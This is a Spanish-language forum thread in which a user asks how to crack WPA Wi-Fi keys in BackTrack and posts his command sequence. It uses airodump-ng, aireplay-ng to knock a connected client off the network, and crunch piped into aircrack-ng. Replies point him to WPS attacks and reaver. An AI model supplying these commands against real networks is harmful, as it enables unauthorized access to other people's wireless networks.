Autor
|
Tema: Según me han contado... WPA (Leído 4,328 veces)
|
WIитX
Desconectado
Mensajes: 1.026
WINTX
|
Ya hay opciones para sacar claves WPA sin necesidad de usar diccionario por ejemplo BackTrack ya puede hacerlo sin necesidad de tener que descargarte ningún diccionario, bueno quería preguntar si eso es verdad y eso así? ^^
Gracias
Ya lo solucioné, es haciendo handShake, gracias a todos igualmente ^^
|
|
« Última modificación: 27 Octubre 2013, 13:20 pm por WINTX »
|
En línea
|
"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
|
|
|
ChimoC
Por la libertad y contra el terrorismo
Ex-Staff
Desconectado
Mensajes: 5.129
Paz, dignidad y justicia
|
Buenas:
Eso no es ninguna solución, eso es necesario (handshake) si quieres pasar diccionario
Saludos
ChimoC
|
|
|
En línea
|
|
|
|
WIитX
Desconectado
Mensajes: 1.026
WINTX
|
Buenas Chimo, bueno los comandos que uso yo son los siguientes. Abro una terminal en Backtrack 5 R3 airodrump-ng mon0 .. etc.. Bueno lo que yo ví e intento es lo siguiente haber si me explico soy algo difícil pero bueno jé :3 yo escaneo, si hay clientes conectados lo que hago es desconectar al cliente para una vez que el ponga su password de nuevo a mi me la envían, ahora mismo no tengo todos los códigos, cuando llegue a mi laptop los pondré por aquí haber si podéis ayudarme y decirme lo que hago mal, porque seguro que algo estoy haciendo mal, bueno cuando tengas un ratillo pequeño haber si te pasas o algo y puedes ayudarme, muchas gracias chimo y a todos los demás :3 PD: Luego actualizo este mensaje con todos los códigos. Saludos.
|
|
|
En línea
|
"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
|
|
|
|
WIитX
Desconectado
Mensajes: 1.026
WINTX
|
HandShake airodump-ng -w redes -c <canal> --bssid <bssid de la red> mon0 "Si recibo respuesta paso al siguiente paso, si hay algún usuario conectado" aireplay-ng -0 5 -a <bssid de la red> -c <station del usuario conectado> mon0 En una terminal nueva escribo lo siguiente, sin llegar a cerrar las otras terminales. En este paso me pierdo un poco con lo del directorio del .capcd /pentest/passwords/crunch ./crunch 10 12 1234567890 l aircrack-ng <directorio del .cap> /root/redes-01.cap -e <nombre de la red> -w- Para ver en la terminal el directorio del .cap en la terminal del handshake escribo, pero igualmente me dice que está en Desktop pero no hay ningún archivo. Saludos y haber si pueden ayudarme ^^ Muchas gracias!!
|
|
|
En línea
|
"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
|
|
|
ChimoC
Por la libertad y contra el terrorismo
Ex-Staff
Desconectado
Mensajes: 5.129
Paz, dignidad y justicia
|
Buenas: Por favor, la próxima vez intenta escribir un título adecuado a tu consulta ya que eso ayuda a la gente (por si tienen tu mismo problma) Es que no se de qué va este post.... NO se dónde te guarda BT la captura (pero por el nombre que le das será redes-01.cap) Mira en la carpeta de usuario de BT (o home o root) por si estuviese ahí la captura También puedes indicarle a airodump que te guarde la captura donde tu quieras - w / eldestino que quieras archivo.cap Un saludo ChimoC P.D: Estudia un poco el tema del WPS (hay un post con chincheta)
|
|
|
En línea
|
|
|
|
WIитX
Desconectado
Mensajes: 1.026
WINTX
|
Buenas: Por favor, la próxima vez intenta escribir un título adecuado a tu consulta ya que eso ayuda a la gente (por si tienen tu mismo problma) Es que no se de qué va este post.... NO se dónde te guarda BT la captura (pero por el nombre que le das será redes-01.cap) Mira en la carpeta de usuario de BT (o home o root) por si estuviese ahí la captura También puedes indicarle a airodump que te guarde la captura donde tu quieras - w / eldestino que quieras archivo.cap Un saludo ChimoC P.D: Estudia un poco el tema del WPS (hay un post con chincheta) Hola, si bueno... esque no sabía bien que poner jejeje gracias por responder, el nombre que le doy es redes, pero entonces hago los pasos bien? o tengo algún error.. Saludos, gracias ^^
|
|
|
En línea
|
"Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
|
|
|
magnum_44
Desconectado
Mensajes: 130
|
Igual se refiere a reaver?
|
|
|
En línea
|
|
|
|
NikNitro!
Desconectado
Mensajes: 1.309
Galletaaa!!!
|
Supongo que será eso... Para vulnerar una red con WPS activo solo necesitas un pc, linux o un live cd (supongo que backtrack te valdrá...), una línea de código, la susodicha red y unas 15 a 20 horitas. Saludos
|
|
|
En línea
|
|
|
|
sanson
Desconectado
Mensajes: 471
|
Hola
O 15 o 20 segundos, según la red y la herramienta que se use
Saludos
|
|
|
En línea
|
|
|
|
|
|